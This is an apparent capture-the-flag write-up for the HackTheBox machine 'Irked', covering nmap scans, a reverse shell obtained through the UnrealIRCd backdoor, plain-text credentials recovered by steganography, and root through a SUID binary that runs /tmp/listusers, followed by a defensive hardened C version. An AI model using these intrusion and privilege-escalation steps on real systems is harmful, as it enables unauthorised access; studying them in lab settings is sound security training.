Irked

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -p- -T4 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:37 CEST
Nmap scan report for 10.10.10.117
Host is up (0.094s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
47160/tcp open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 162.14 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,6697,8067,47160,65534 10.10.10.117
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:41 CEST
Nmap scan report for 10.10.10.117
Host is up (0.093s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47160/tcp   status
|   100024  1          48955/udp   status
|   100024  1          54720/tcp6  status
|_  100024  1          58993/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47160/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 6697/tcp)
HOP RTT      ADDRESS
1   93.68 ms 10.10.14.1
2   93.72 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.65 seconds

Exploitation

Getting shell

As we can see, the host has an UnrealIRCd server installed and running. Searching the internet, we can find an exploit for a known backdoor in UnrealIRCd that should give us a shell.

We need to edit it and enter our IP and the port we want to listen on in these lines.

# Sets the local ip and port (address and port to listen on)
local_ip = ''  # CHANGE THIS
local_port = ''  # CHANGE THIS 

Now, with a listener running in another terminal, we just have to run the exploit: python3 UnrealIRCd.py -payload python 10.10.10.117 8067.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.117] 50785
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$

Post exploitation

Privilege escalation: ircd to djmardov

Enumeration

Bash History

Looking at the .bash_history file, we can see that a file called .backup inside /home/djmardov/Documents/ has recently been read.

ircd@irked:~$ cat .bash_history
[...]
cd djmardov
ls
cd Documents
ls -lah
cat .backup
[...]

If we look at its content, it shows us what it claims is a password for something hidden with steganography.

ircd@irked:~$ cd /home/djmardov/Documents/
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
ircd@irked:/home/djmardov/Documents$

If we look at the website, we find the following image.

Steghide

When we download it and run steghide on it with the password obtained from the .backup file, we extract a file called pass.txt that contains the password of the user djmardov.

$ steghide --extract -sf irked.jpg
Anotar salvoconducto: 
anoté los datos extraídos e/"pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG

And now we can use the password to connect via SSH and read the user flag.

$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ cat user.txt
CENSORED_FLAG
djmardov@irked:~/Documents$

Privilege escalation: djmardov to root

SUID

djmardov@irked:~/.cache$ find / -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

One of these, /usr/bin/viewuser, is not a standard system binary. Let's download it to our machine and see what it does.

Viewuser

This is the pseudocode of the binary as decompiled with Ghidra.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  /* The typo "devleoped" is in the binary's own string. */
  puts("This application is being devleoped to set and test user permissions");
  puts("It is still being actively developed");
  system("who");            /* runs through /bin/sh with the caller's environment */
  setuid(0);                /* the binary is SUID root, so this makes the real uid 0 as well */
  system("/tmp/listusers"); /* fixed path inside world-writable /tmp: any local user can supply this file */
  return 0;
}

As we can see, we should be able to create a script called /tmp/listusers that executes /bin/bash, and it will run as root thanks to the setuid(0) call.

djmardov@irked:~$ echo "/bin/bash" > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers

Now we execute the SUID binary and we will be root!

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-04-14 13:40 (:0)
djmardov pts/2        2021-04-14 14:29 (10.10.14.2)
root@irked:~# whoami
root
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# cat /root/root.txt
CENSORED_FLAG
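The root of the viewuser problem is that a SUID-root program executes a fixed path inside world-writable /tmp through a shell. As an added example from the defender's side (this is not the viewuser binary from the box nor code by the writeup's author), the following hardened variant refuses to run a helper unless both the file and its directory are owned by the trusted user and not writable by anyone else, and it executes the helper directly rather than via system(). The path /usr/local/sbin/listusers and the function names are assumptions made for this example; the self-check builds its own files under /tmp and uses the current user as the trusted owner because a test cannot chown to root.

```c
/* Added example (defensive): a hardened variant of the SUID helper decompiled
 * above. NOT the viewuser binary from the box. The original runs
 * system("/tmp/listusers") after setuid(0), so any local user who can write to
 * /tmp decides what root executes. Fix: fixed path in a root-owned directory,
 * owner/mode checks on the file AND its directory, direct exec without a shell.
 * HELPER_PATH is an assumed location for this example. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>

#define HELPER_PATH "/usr/local/sbin/listusers"  /* assumed path, not the box's */

/* Returns 1 if `path` is a regular file owned by `trusted_uid`, not writable by
 * group or others, and its parent directory is owned by `trusted_uid` and not
 * group/world writable either. A world-writable directory such as /tmp fails
 * even when the file itself looks fine, because the file can be replaced. */
int helper_is_trusted(const char *path, uid_t trusted_uid)
{
    struct stat st;
    char dir[4096];
    const char *slash = strrchr(path, '/');
    size_t len = slash ? (size_t)(slash - path) : 0;

    if (lstat(path, &st) != 0) return 0;              /* missing or unreadable */
    if (!S_ISREG(st.st_mode)) return 0;               /* no symlinks, dirs, devices */
    if (st.st_uid != trusted_uid) return 0;           /* wrong owner */
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;   /* others could rewrite it */

    if (len == 0) {
        strcpy(dir, slash ? "/" : ".");               /* "/file" or bare "file" */
    } else {
        if (len >= sizeof dir) return 0;
        memcpy(dir, path, len);
        dir[len] = '\0';
    }
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    if (st.st_uid != trusted_uid) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;   /* /tmp is mode 1777: rejected */
    return 1;
}

/* Runs `path` with no arguments and a minimal environment, without /bin/sh.
 * Returns the child's exit status, or -1 if it could not be run. */
int run_fixed(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    int status;
    pid_t pid = fork();

    if (pid < 0) return -1;
    if (pid == 0) { execve(path, argv, envp); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check on constructed files: a mode-0777 helper in a private directory is
 * rejected, the same file at mode 0755 is accepted, and it is rejected again
 * once its directory becomes mode 1777 like /tmp. The trusted owner is the
 * current user here (a test cannot chown to root); production code passes 0. */
int selfcheck_with_temp_files(void)
{
    char dir[] = "/tmp/viewuser-demo-XXXXXX";
    char file[sizeof dir + 16];
    uid_t me = getuid();
    int fd, ok = 1;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(file, sizeof file, "%s/listusers", dir);
    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0700);
    if (fd < 0) { rmdir(dir); return 0; }
    close(fd);

    ok &= (chmod(file, 0777) == 0 && helper_is_trusted(file, me) == 0);  /* like /tmp/listusers */
    ok &= (chmod(file, 0755) == 0 && helper_is_trusted(file, me) == 1);  /* properly protected */
    ok &= (chmod(dir, 01777) == 0 && helper_is_trusted(file, me) == 0);  /* directory like /tmp */

    unlink(file);
    rmdir(dir);
    return ok;
}

int main(void)
{
    puts("viewuser (hardened example): listing logged-in users");
    run_fixed("/usr/bin/who");                        /* direct exec, no shell */
    /* No setuid(0) needed: the SUID bit already gives effective uid 0. */
    if (!helper_is_trusted(HELPER_PATH, 0)) {
        fprintf(stderr, "refusing to run %s: not root-owned or writable by others\n", HELPER_PATH);
        return 1;
    }
    return run_fixed(HELPER_PATH) == 0 ? 0 : 1;
}
```

The directory check is the part most often forgotten: a root-owned, mode-0755 file sitting in a 1777 directory can still be removed and replaced by the directory's other writers, so checking the file alone would still have left /tmp/listusers exploitable. Auditing SUID binaries for system() or exec of paths under /tmp, /var/tmp or a user's home (for example with strings) is the corresponding detection step for a defender reviewing a host like this one.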